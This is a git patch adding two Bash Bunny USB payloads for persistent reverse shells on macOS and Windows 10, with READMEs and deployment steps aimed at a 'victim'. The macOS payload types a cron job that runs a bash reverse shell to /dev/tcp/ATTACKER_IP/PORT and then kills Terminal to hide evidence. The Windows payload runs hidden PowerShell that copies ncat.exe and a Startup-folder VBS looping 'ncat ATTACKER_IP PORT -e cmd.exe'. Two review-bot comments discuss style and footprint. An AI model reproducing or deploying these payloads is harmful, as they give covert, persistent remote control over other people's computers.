From 7f902403d49961614d3d2cfd34c4db16a3ea5441 Mon Sep 17 00:00:00 2001
From: KeenanV
Date: Sun, 21 Jan 2018 15:39:14 -0800
Subject: [PATCH] Persistent Reverse Shells for MacOS and Windows 10 (#306)
---
 .../MacPersistentReverseShell/README.md | 44 ++++++++++++++++++
 .../MacPersistentReverseShell/payload.txt | 32 +++++++++++++
 .../WindowsPersistentReverseShell/README.md | 45 +++++++++++++++++++
 .../WindowsPersistentReverseShell/payload.txt | 18 ++++++++
 .../persistence.vbs | 7 +++
 .../WindowsPersistentReverseShell/run.ps1 | 20 +++++++++
 6 files changed, 166 insertions(+)
 create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/README.md
 create mode 100644 payloads/library/remote_access/MacPersistentReverseShell/payload.txt
 create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/README.md
 create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt
 create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs
 create mode 100644 payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1
diff --git a/payloads/library/remote_access/MacPersistentReverseShell/README.md b/payloads/library/remote_access/MacPersistentReverseShell/README.md
new file mode 100644
index 00000000..591202e4
--- /dev/null
+++ b/payloads/library/remote_access/MacPersistentReverseShell/README.md
@@ -0,0 +1,44 @@
+# Reverse Shell Mac for Bash Bunny
+
+* Author: 0dyss3us (KeenanV)
+* Version: 1.2
+
+## Description
+
+Opens a persistent reverse shell on victim's mac and connects it back to host attacker over TCP.
+* Targets MacOS
+* Connection can be closed and reconnected at any time
+* Deploys in roughly 23 sec
+* Works well with NetCat as the listener
+
+## Requirements
+
+Have a working Bash Bunny :)
+
+## STATUS
+
+| LED | STATUS |
+| -------------------- | ---------------------------- |
+| Purple | Setup |
+| Amber (Single Blink) | Launching Terminal |
+| Amber (Double Blink) | Creating cron job |
+| White (Fast Blink) | Cleaning up |
+| Green | Finished |
+
+## Configuration and Execution
+
+1. Plug in Bash Bunny in arming mode
+2. Move files from MacPersistentReverseShell to either switch folder
+3. Edit the payload.txt file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
+5. Unplug Bash Bunny and switch it to the position the payload is loaded on
+6. Plug the Bash Bunny into your victim's Mac and wait until the final light turns green (about 30 sec)
+7. Unplug the Bash Bunny and go to attacker's machine
+8. Listen on the port you chose in the payload.txt file on whichever program you'd like (I use NetCat)
+ * If using NetCat, run the command `nc -nlvp 1337` (replace the port with the port in connect.sh)
+ * If using Windows as the attacker machine, you must install Ncat from: http://nmap.org/dist/ncat-portable-5.59BETA1.zip and use the command `ncat` instead of `nc` from the directory that you installed ncat.exe.
+9. Wait for connection (Should take no longer than 1 minute as the cron job runs every minute)
+10. Once a bash shell prompt appears...YOU'RE DONE!!
:smiley: and you can disconnect and reconnect to the victim at any time as long as the user is logged in
+
+## Discussion
+
+[Click here](https://forums.hak5.org/topic/42728-payload-mac-persistent-reverse-shell/) to access the forum post.
diff --git a/payloads/library/remote_access/MacPersistentReverseShell/payload.txt b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt
new file mode 100644
index 00000000..f25b9034
--- /dev/null
+++ b/payloads/library/remote_access/MacPersistentReverseShell/payload.txt
@@ -0,0 +1,32 @@
+# Title: Mac Persistent Reverse Shell
+# Description: Creates a persistent reverse shell on Mac victim that connects back to NetCat host
+# Author: 0dyss3us (KeenanV)
+# Props:
+# Version: 1.2
+# Category: Remote Access
+# Target: MacOS
+# Attackmodes: HID, Storage
+
+# Sets attack modes and stores current switch position
+LED SETUP
+ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
+GET_SWITCH_POSITION
+
+# Opens the terminal
+LED STAGE1
+RUN OSX terminal
+Q DELAY 2000
+
+# Makes a cron job that will run once every minute
+Q STRING \(crontab -l 2\>/dev/null\; echo \"\* \* \* \* \* bash -i \>\& /dev/tcp/ATTACKER_IP/PORT 0\>\&1\"\) \| crontab -
+Q ENTER
+Q DELAY 2000
+
+LED CLEANUP
+# Clears and kills the terminal to hide the evidence
+Q STRING clear
+Q ENTER
+Q DELAY 500
+Q STRING killall Terminal
+Q ENTER
+LED FINISH
diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/README.md b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md
new file mode 100644
index 00000000..2b318c6c
--- /dev/null
+++ b/payloads/library/remote_access/WindowsPersistentReverseShell/README.md
@@ -0,0 +1,45 @@
+# Windows Persistent Reverse Shell for Bash Bunny
+
+* Author: 0dyss3us (KeenanV)
+* Version: 1.1
+
+## Description
+
+Opens a persistent reverse shell through NetCat on victim's Windows machine and connects it back to host attacker.
+* Targets Windows 10 (working on support for older versions)
+* Connection can be closed and reconnected at any time
+* Deploys in roughly 15-20 sec
+* Works with NetCat
+
+## Requirements
+
+Have a working Bash Bunny :)
+
+## STATUS
+
+| LED | STATUS |
+| -------------------- | ------------------------------ |
+| Purple | Setup |
+| Amber (Single Blink) | Installing and running scripts |
+| Green | Finished |
+
+## Installation and Execution
+
+1. Plug in Bash Bunny in arming mode
+2. Move files from WindowsPersistentReverseShell to either switch folder
+3. Download ncat from http://nmap.org/dist/ncat-portable-5.59BETA1.zip and place the downloaded ncat.exe file in the same switch folder.
+4. Edit the persistence.vbs file and replace `ATTACKER_IP` with attacker's IP and `PORT` with whichever port you like to use (I use 1337 :wink:)
+5. Edit the run.ps1 file and replace `BashBunny` with the volume name of your Bash Bunny
+6. Save the persistence.vbs file
+7. Unplug Bash Bunny and switch it to the position the payload is loaded on
+8. Plug the Bash Bunny into your victim's Windows machine and wait until the final light turns green (about 15-20 sec)
+9. Unplug the Bash Bunny and go to attacker's machine
+10. Listen on the port you chose in the persistence.vbs file on NetCat
+ * Run the command `nc -nlvp 1337` (replace the port with the port in persistence.vbs)
+ * If using Windows as the attacker machine, you must move the same ncat.exe file downloaded in step 3 to any directory and use the command `ncat` instead of `nc` from that directory.
+11. Wait for connection (Should take no longer than 1 minute as the powershell command runs every minute)
+12. Once a Windows cmd prompt appears...YOU'RE DONE!!
:smiley: and you can disconnect and reconnect at any time as long as the user is logged in
+
+## Discussion
+
+[Click here](https://forums.hak5.org/topic/42729-payload-windows-persistent-reverse-shell/) for forum discussion
diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt
new file mode 100644
index 00000000..fc89bd61
--- /dev/null
+++ b/payloads/library/remote_access/WindowsPersistentReverseShell/payload.txt
@@ -0,0 +1,18 @@
+# Title: NetCat Reverse Shell Windows
+# Description: Creates a persistent reverse shell on Windows and connects back to attacker through NetCat
+# Author: 0dyss3us (KeenanV)
+# Props:
+# Version: 1.0
+# Category: Remote Access
+# Target: Windows 10
+# Attackmodes: HID, Storage
+
+#Sets attack mode and stores current switch position
+LED SETUP
+ATTACKMODE HID STORAGE
+GET SWITCH_POSITION
+
+#Runs Powershell script which puts a .vbs file in the startup folder and runs it
+LED ATTACK
+RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
+LED FINISH
\ No newline at end of file
diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs
new file mode 100644
index 00000000..f6db2e03
--- /dev/null
+++ b/payloads/library/remote_access/WindowsPersistentReverseShell/persistence.vbs
@@ -0,0 +1,7 @@
+Dim ncShell
+Set ncShell = WScript.CreateObject("WScript.shell")
+
+Do while True:
+ ncShell.Run "powershell.exe C:\temp\ncat.exe ATTACKER_IP PORT -e cmd.exe", 0, true
+ WScript.Sleep(60000)
+loop
diff --git a/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1 b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1
new file mode 100644
index 00000000..b6b81438
--- /dev/null
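Review bot: `Do while True:` in persistence.vbs carries a trailing colon, which VBScript reads as a statement separator followed by an empty statement; the conventional spelling is `Do While True` with the closing `Loop` capitalised to match. The file also has no header comment, so a reader has to find out from run.ps1 that this script is the one copied into the user's Startup folder; a one-line `' Installed into the current user's Startup folder by run.ps1; ATTACKER_IP and PORT are placeholders edited per the README` at the top would make the file self-describing.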
+++ b/payloads/library/remote_access/WindowsPersistentReverseShell/run.ps1
@@ -0,0 +1,20 @@
+$Drive = (Get-WMIObject Win32_Volume | ? { $_.Label -eq 'BashBunny' }).name
+$user = $env:UserName
+$NetCatFile = $Drive + "payloads\switch1\ncat.exe"
+$PersistenceFile = $Drive + "payloads\switch1\persistence.vbs"
+$DestinationFile1 = "C:\temp\ncat.exe"
+$DestinationFile2 = ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persistence.vbs")
+
+If ((Test-Path $DestinationFile1) -eq $false){
+ New-Item -ItemType File -Path $DestinationFile1 -Force
+}
+If ((Test-Path $DestinationFile2) -eq $false){
+ New-Item -ItemType File -Path $DestinationFile2 -Force
+}
+
+Copy-Item -Path $NetCatFile -Destination $DestinationFile1
+Copy-Item -Path $PersistenceFile -Destination $DestinationFile2
+
+Set-Location -Path ("C:\Users\" + $user + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
+
+Start-Process cmd -ArgumentList "/c start persistence.vbs"
\ No newline at end of file
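Review bot: The on-disk footprint of run.ps1 is documented nowhere: the script writes `C:\temp\ncat.exe` and drops `persistence.vbs` into the current user's Startup folder, and neither the README's step list nor the script itself says so, so anyone verifying the payload in a lab or restoring the test machine afterwards has to reverse it from `$DestinationFile1` and `$DestinationFile2`. A header comment such as `# Leaves ncat.exe in C:\temp and persistence.vbs in the user's Startup folder; both remain on the machine after the run` would state the footprint up front. The README's step 5 also only mentions editing the `BashBunny` label in this file, while `$NetCatFile` and `$PersistenceFile` additionally hard-code `switch1`, which is worth a comment on those two lines since the payload may be loaded on either switch.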